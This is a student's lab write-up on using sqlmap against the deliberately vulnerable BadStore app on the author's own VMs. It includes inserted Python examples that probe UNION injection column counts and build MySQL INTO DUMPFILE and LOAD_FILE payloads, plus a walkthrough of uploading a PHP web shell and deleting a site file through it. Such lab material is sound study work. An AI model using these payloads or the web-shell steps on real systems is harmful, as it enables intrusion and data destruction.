Toying with SQLmap

First things first, what is sqlmap? It's an open source penetration testing tool that automates detecting and exploiting SQL injection flaws and taking over database servers. I won't get into the full capabilities here, but you can learn more at [http://sqlmap.org/]*

The following is really just a combination of my notes and an extra credit assignment given by one of my professors in the spring. This was not a tool we covered in class, and the question was "Can you get a shell on a web server using sqlmap?"

The initial setup here is a Kali Linux virtual machine and a Windows 7 virtual machine hosted on my own personal workstation. At the time, I had the vulnerable web application BadStore [] running on the Windows 7 VM. The website was accessible to the Kali VM via an entry in the /etc/hosts file. I typically used Burp Suite as my proxy from the Kali Linux VM; however, this was my exploration of sqlmap used alone.

us@vamanos:~$

Premise: Using sqlmap from my Kali VM to attack a web application hosted on my Windows 7 VM, it is possible to get a shell on the web server.

sqlmapbegin

First, run sqlmap against a URL hosted on the target server to see what you can learn about the system. It will also show what kinds of SQL injection a parameter, like the GET parameter customerid, is vulnerable to. In the following, a form submission URL was fed to sqlmap with the -u option.

The image is of the command line on Kali Linux. The sqlmap output indicates that the GET parameter 'customeridget' is injectable via 'Generic UNION query (NULL) - 1 to 20 columns'. sqlmap prompts the user to ask whether the other techniques should be tested. Yes is selected. More information is displayed regarding the GET parameter 'customeridget' and the payloads used. sqlmap indicates the back-end database management system is MySQL. The web server operating system is Windows 7. The web application technologies include Apache 2.2.22 and PHP 7.1.7. The version of MySQL is greater than or equal to 5.0.12. The data is fetched and logged to text files under /root/.sqlmap/output/www.sql.net

Finally, we can also see the server OS, the Apache version and the type of database.

So we know it's a site hosted with Apache 2.2.22 and PHP 7.1.7 on Windows 7, backed by MySQL 5.0.12 or later. This information has been automatically saved to a file for us as well.
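The 'Generic UNION query (NULL) - 1 to 20 columns' finding above is worth understanding before you let the tool do it for you. The following is an added example (not the original post's code and not sqlmap's own code) that walks through the probing sqlmap performs: keep appending NULL columns to a UNION until the database stops raising a column-count error, then use one of the aligned slots to pull the DBMS banner out of the page. It uses an in-memory SQLite table as a constructed stand-in for the MySQL back end, so the table, rows and query are assumptions; the deliberately vulnerable lookup mirrors the class of bug reported for 'customeridget', not BadStore's actual query.

```python
import sqlite3

MAX_COLUMNS = 20  # matches sqlmap's default upper bound ("1 to 20 columns")


def make_db():
    """Constructed stand-in for the target database (SQLite, not MySQL)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER, name TEXT, price REAL)")
    db.executemany("INSERT INTO products VALUES (?, ?, ?)",
                   [(1, "widget", 9.99), (2, "gadget", 19.99)])
    return db


def vulnerable_lookup(db, customeridget):
    """Deliberately vulnerable: the GET value is pasted straight into the
    query, which is exactly what makes a UNION-based injection possible."""
    sql = "SELECT id, name, price FROM products WHERE id = %s" % customeridget
    return db.execute(sql).fetchall()


def find_union_column_count(db, max_columns=MAX_COLUMNS):
    """Probe '1 UNION SELECT NULL', '1 UNION SELECT NULL,NULL', ... until the
    DBMS accepts the UNION; that number is the column count of the
    original SELECT. Returns None if nothing lined up within the bound."""
    for n in range(1, max_columns + 1):
        payload = "1 UNION SELECT " + ",".join(["NULL"] * n)
        try:
            vulnerable_lookup(db, payload)
            return n  # no error: the UNION is aligned with the query
        except sqlite3.OperationalError:
            continue  # column-count mismatch, try one more NULL
    return None


def fetch_banner(db, column_count, slot=1):
    """Drop sqlite_version() (VERSION() on MySQL) into one NULL slot of the
    aligned UNION and read it back from the injected result row. The
    injected row is recognisable because its id column is NULL."""
    cols = ["NULL"] * column_count
    cols[slot] = "sqlite_version()"
    payload = "1 UNION SELECT " + ",".join(cols)
    for row in vulnerable_lookup(db, payload):
        if row[0] is None:
            return row[slot]
    return None


if __name__ == "__main__":
    db = make_db()
    n = find_union_column_count(db)
    print("injectable with a %d-column UNION" % n)
    print("DBMS banner:", fetch_banner(db, n))
```

The slot you use for the banner has to be one whose value the page actually renders, which is why sqlmap reports the NULL layout it settled on. sqlmap also tries an ORDER BY n probe for the column count, but the NULL-padding approach above is the one named in the finding.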

Looking through the advanced help (sqlmap -hh), there are a few options that seem interesting.


sqlmap_advanced_help
It's critical to get comfortable using a tool's native help functions, whether that's man pages in Linux, Get-Help in PowerShell, or the built-in help of any command-line tool or interface, period.


I didn't want to mess with the registry to prove access, since I wanted to more or less maintain the VM for later practice. So I went full script kiddie and used the --file-write and --file-dest options to upload the WhiteWinterWolf PHP web shell [https://www.whitewinterwolf.com/posts/2017/12/02/wwwolfs-php-webshell-users-guide/] to the web server. For the purpose of making it easier for me to upload files and browse the system, it was quite helpful. The two images below are screencaps from the Windows 7 VM that I took to verify the file was uploaded.

win7_peeking_at_directory

win7_textfile_php


I was able to navigate to the web shell like so:

z_webshell_in_use
1: You can see how easy it is to upload a file from here and place it into the web server's directory. It's no harder to find the IIS webroot, inetpub (this was serving a copy of the same website at the time, but I was more personally interested in Apache).
z_webshell_in_use2
2: Executing only minimal commands in the shell gave me a listing of the C drive contents and other information.
z_webshell_in_use3
3: You can use sqlmap to identify the web root, though I skipped that step to be honest. I knew the webroot was here for the 'sql.com' version of BadStore I was hosting.
z_webshell_in_use4
4: 'del main.php' executed in that directory deleted the file, breaking the site. When I ran it a second time I got the 'Could Not Find' error you see there.

Image 4 above shows where my assignment write-up left off, more or less. It did take me a fair bit of trial and error, since it was the first time I'd used sqlmap, but it really does a lot of the work for you. If you're like me, then hosting and breaking your own vulnerable web apps is the easiest way to learn about and really understand how these systems work together. But you haven't really done anything if you use other people's tools, so don't neglect that side of study either!

All that's left from here on out are the notes I kept for myself on the assignment and a footnote about proper use of sqlmap. Feel free to peace out at this point. I'd recommend visiting sqlmap.org to look at the demos and information they have available to learn more.

me@notes:~$

--os-shell (from the file access help in sqlmap)

I thought from the description that maybe it meant a CMD shell on Windows. But it's actually giving a whole bunch of options to find writable web root / htdocs directories.

sqlmap_brute_force_common_dir

sqlmap_brute_force_common_dir_detail

It wasn't that helpful, because the process user (which is what I was at the time) doesn't have the privilege to write there.

--priv-esc with --os-shell: Adding --priv-esc didn't noticeably change the --os-shell output, and running it as the only option other than -u only gave stored session information.

--file-read=Index

sqlmap_readfileindex

If you open Index with nano there is nothing there...

sqlmap_fileaccess2.png

Not really sure if it's reading anything, or what good it is to me if I can't personally read it. When I searched for a fake file, it saved the information to a text file and didn't create a document in the /www.sql.net/files directory.
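Both the --file-write/--file-dest upload of the web shell earlier and the --file-read attempt here ride on the same MySQL primitives, so one added example covers both. This is my own illustration, not code from the post or from sqlmap: on MySQL a file write through a UNION injection is a hex literal of the file contents placed in one aligned column and terminated with INTO DUMPFILE, and a file read is HEX(LOAD_FILE('path')) in the same slot, which is my understanding of what sqlmap does for this DBMS. The column count (3), slot (1) and paths are constructed assumptions. The last function is the caveat for the empty Index file: LOAD_FILE() returns NULL rather than an error when the file does not exist, the MySQL account lacks the FILE privilege, secure_file_priv forbids the location, or the mysqld OS account cannot read it, and NULL saved to disk looks like an empty file.

```python
def mysql_union_expr(expr, column_count, slot):
    """Place one expression in a NULL-padded UNION row of the column count
    found during detection (3 here is a constructed example)."""
    cols = ["NULL"] * column_count
    cols[slot] = expr
    return "1 UNION ALL SELECT " + ",".join(cols)


def _mysql_path(path):
    """MySQL accepts forward slashes on Windows, which avoids backslash
    escaping inside the string literal; single quotes are doubled."""
    return path.replace("\\", "/").replace("'", "''")


def mysql_write_payload(content, dest_path, column_count, slot):
    """File write: 0x<hex> ... INTO DUMPFILE. DUMPFILE writes the raw bytes
    with no row or column terminators, which is what a PHP file needs.
    Needs the FILE privilege, a secure_file_priv that allows dest_path,
    and an mysqld OS account that can write to the web root."""
    hexed = "0x" + bytes(content).hex()
    return (mysql_union_expr(hexed, column_count, slot)
            + " INTO DUMPFILE '%s'" % _mysql_path(dest_path))


def mysql_read_payload(path, column_count, slot):
    """File read: HEX(LOAD_FILE()) keeps binary content intact in transit."""
    expr = "HEX(LOAD_FILE('%s'))" % _mysql_path(path)
    return mysql_union_expr(expr, column_count, slot)


def decode_read_result(value):
    """Turn the hex string pulled out of the page back into bytes.
    None/empty means LOAD_FILE() returned NULL: missing file, no FILE
    privilege, secure_file_priv restriction, or unreadable by mysqld."""
    if value is None or value == "":
        return None
    return bytes.fromhex(value)


if __name__ == "__main__":
    shell = b"<?php echo 1; ?>"  # constructed placeholder, not a real web shell
    print(mysql_write_payload(shell, r"C:\xampp\htdocs\x.php", 3, 1))
    print(mysql_read_payload(r"C:\xampp\htdocs\Index", 3, 1))
    print(decode_read_result(None), decode_read_result("3c3f706870"))
```

Before spending time on --file-write or --file-read, check the preconditions with sqlmap's own --current-user, --is-dba and --privileges options; a MySQL account without FILE, or a secure_file_priv that points away from the web root, makes every write silently fail and every read come back NULL.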


*On sqlmap: At the time I last accessed sqlmap's webpage, HTTPS was not configured. It is published under the GNU General Public License. Please note their disclaimer: "Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program."
